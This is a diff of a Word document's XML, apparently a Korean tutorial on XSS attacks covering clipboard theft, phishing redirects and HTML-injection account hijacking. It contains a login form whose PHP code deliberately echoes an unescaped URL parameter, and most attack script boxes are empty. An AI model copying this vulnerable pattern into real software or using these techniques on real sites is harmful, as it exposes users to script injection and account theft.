+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;label&gt;Password :&lt;/label&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="700" w:left="1400"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;input type=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>password</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> name=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>password</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>/&gt;&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>br</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="700" w:left="1400"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;input type=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>hidden</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> name=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>redirectUrl</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> value=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;?</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> echo $_GET[</w:t>
+            </w:r>
+            <w:r>
+              <w:t>‘</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>rurl</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>’</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>]; ?&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&gt;&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>br</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="700" w:left="1400"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;input type=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>submit</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> value=</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Submit</w:t>
+            </w:r>
+            <w:r>
+              <w:t>”</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>/&gt;&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>br</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> /&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="600" w:left="1200"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;/form&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="500" w:left="1000"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;/body&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>&lt;/html&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1101" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>실행결과</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9563" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43332FFE" wp14:editId="1DC4ED28">
+                  <wp:extent cx="5943600" cy="3923030"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+                  <wp:docPr id="5" name="그림 5"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="0" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId7"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="5943600" cy="3923030"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a3"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1101"/>
+        <w:gridCol w:w="9563"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10664" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="304"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1101" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>실행결과</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9563" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">비 인가 상태에서 사이트 이용 중 인증이 필요한 로그인 페이지로 사용자를 이동시켜 로그인 완료 후, 다시 이용 중이던 페이지로 이동시켜주는 방식의 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">서비스들을 많이 볼 수 있다. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">이때 로그인 후 이동할 페이지 값을 페이지에 확인없이 포함하여 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Reflected XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>취약점이 발생한다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>클립보드 값 탈취</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>키로깅</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>클립보드 복사</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 페이지</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -217,221 +950,6 @@
             <w:pPr>
               <w:ind w:left="800"/>
             </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1101" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>실행결과</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9563" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="a3"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="1101"/>
-        <w:gridCol w:w="9563"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="10664" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>&lt;/script&gt;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="304"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1101" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>실행결과</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9563" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">비 인가 상태에서 사이트 이용 중 인증이 필요한 로그인 페이지로 사용자를 이동시켜 로그인 완료 후, 다시 이용 중이던 페이지로 이동시켜주는 방식의 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">서비스들을 많이 볼 수 있다. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">이때 로그인 후 이동할 페이지 값을 페이지에 확인없이 포함하여 </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Reflected XSS </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>취약점이 발생한다.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
-        </w:numPr>
-        <w:ind w:leftChars="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>클립보드 값 탈취</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>키로깅</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 공격과 유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="4"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:ind w:leftChars="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>클립보드 복사</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 페이지</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="a3"/>
-        <w:tblW w:w="0" w:type="auto"/>
-        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="1101"/>
-        <w:gridCol w:w="9563"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="10664" w:type="dxa"/>
-            <w:gridSpan w:val="2"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-            </w:pPr>
             <w:r>
               <w:t>&lt;!DOCTYPE html&gt;</w:t>
             </w:r>
@@ -441,6 +959,7 @@
               <w:ind w:left="800"/>
             </w:pPr>
             <w:r>
+              <w:lastRenderedPageBreak/>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
@@ -647,6 +1166,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>실행결과</w:t>
             </w:r>
           </w:p>
@@ -676,7 +1196,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill rotWithShape="1">
-                          <a:blip r:embed="rId7">
+                          <a:blip r:embed="rId8">
                             <a:extLst>
                               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                 <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -770,7 +1290,6 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>new Image().</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
@@ -818,7 +1337,6 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>실행결과</w:t>
             </w:r>
           </w:p>
@@ -845,6 +1363,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>피싱 사이트로 이동</w:t>
       </w:r>
     </w:p>
@@ -870,7 +1389,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>HTML 태그를 이용한 스크립트 실행</w:t>
+        <w:t>HTML 태그</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 속성을</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 이용한 스크립트 실행</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -890,13 +1421,7 @@
         <w:t>DDoS 공격</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="3"/>
@@ -916,35 +1441,177 @@
         <w:t>HTML Injection</w:t>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>결론</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>XSS 공격과 동일하게 사용자에게 서비스를 나타내는 과정에서 발생되지만 공격 시 HTML 태그를 삽입한다는 차이점이 있다. 위험도는 낮지만 다양한 활용방법이 존재한다. 다음은 계정을 가로채는 예시이다.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">XSS 취약점은 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
-      </w:r>
+      <w:pPr>
+        <w:pStyle w:val="4"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:ind w:leftChars="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>로그인 페이지</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a3"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1101"/>
+        <w:gridCol w:w="9563"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10664" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1101" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>실행결과</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9563" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a3"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1101"/>
+        <w:gridCol w:w="9563"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="10664" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="0"/>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="304"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1101" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>실행결과</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9563" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p/>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>결론</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS 취약점은 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>사용자의 입력 값을 제대로 검증하지 않아 삽입된 스크립트 구문이 동작하는 것이 근본적인 원인이다. 특정 구문 기반 확인 방식은 취약점을 해결할 수 없다. 스크립트 구문이나 HTML 태그의 입력과 동작을 막는 것에 목표를 두고 지속적인 보안이 필요하다.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
         <w:rPr>
@@ -1020,6 +1687,7 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>스크립팅은</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
